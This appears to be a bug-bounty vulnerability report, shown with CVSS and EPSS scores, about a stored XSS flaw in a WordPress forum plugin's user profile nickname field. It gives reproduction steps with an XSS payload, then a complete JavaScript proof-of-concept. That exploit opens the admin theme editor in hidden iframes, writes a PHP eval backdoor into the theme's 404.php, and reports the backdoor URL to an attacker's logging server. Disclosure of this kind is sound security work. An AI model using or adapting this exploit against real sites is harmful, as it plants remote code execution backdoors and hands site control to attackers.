3.5 Low
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:S/C:N/I:P/A:N
0.004 Low
EPSS
Percentile
71.3%
#Intro:
Encouraged by the success of cure53 and their reward, i start the research plugins in your scope. And almost immediately i found critical Stored XSS, which of course leeds to privelege escalation or PHP code execution. This vulnerability doesnt requres “special” preveleges like CVE-2015-5622. To demonstrate how this vulnerability elementary for expluatation i write a XSS to Shell exploit.
#Steps to reproduce the XSS:
Send any message on topic or start new topic.
Edit this message.
Open http://localhost/wordpress/?bbp_user=%YOUR_USER_ID%&edit=1
Edit your “Nickname” to:
user1"onmouseover="alert(1);remove()"style="position:absolute;left:0;top:0;margin-top:-100%;margin-left:-100%;width:5000px;height:5000px"
Change your “Display Name” to new “Nickname”, save and return to thread with your message.
#Screenshot:
{F10472} (In attachment)
#XSS to RCE PoC exploit:
var yourServer = "%Path to your logger%"
var payload = "<?php eval($_GET['wp']); ?>"+"\n";
SitePath = document.head.innerHTML.match(/rel=\"pingback\" href=\"(.*?)\/xmlrpc.php\"/m)[1]
function eas(){ // edit and save
ov = window.frames.win404.document.getElementById('newcontent').value
window.frames.win404.document.getElementById('newcontent').value = payload + ov
document.getElementsByName('win404')[0].setAttribute("onload","");
window.frames.win404.document.getElementsByName('submit')[0].click()
((new Image).src=yourServer+"?message=Check your backdoor here: "+SitePath+"/wp-content/themes/"+themeName+"/404.php?wp=phpinfo();")
}
function pao(){ // parse and open
ewin = window.frames.editor.contentWindow || window.frames.contentDocument
url404 = unescape(ewin.document.getElementById('templateside').getElementsByTagName('a')[0].href)
filepar = url404.match(/\?file\=(.*?)\&/m)[1]
if(filepar.length>10){
themeName = url404.match(/file\=\/themes\/(.*?)\//m)[1]
}
else{
themeName = url404.match(/theme\=(.*?)$/m)[1]
}
var win404 = document.createElement("iframe");
win404.style.opacity=0
win404.name = 'win404';
win404.src = url404
win404.setAttribute("onload","eas();this.onload=''");
document.body.appendChild(win404);
}
var editor = document.createElement("iframe");
editor.style.opacity=0
editor.name = 'editor';
editor.src = SitePath+"/wp-admin/theme-editor.php";
editor.setAttribute("onload","pao();this.onload='';");
document.body.appendChild(editor);
Best regards!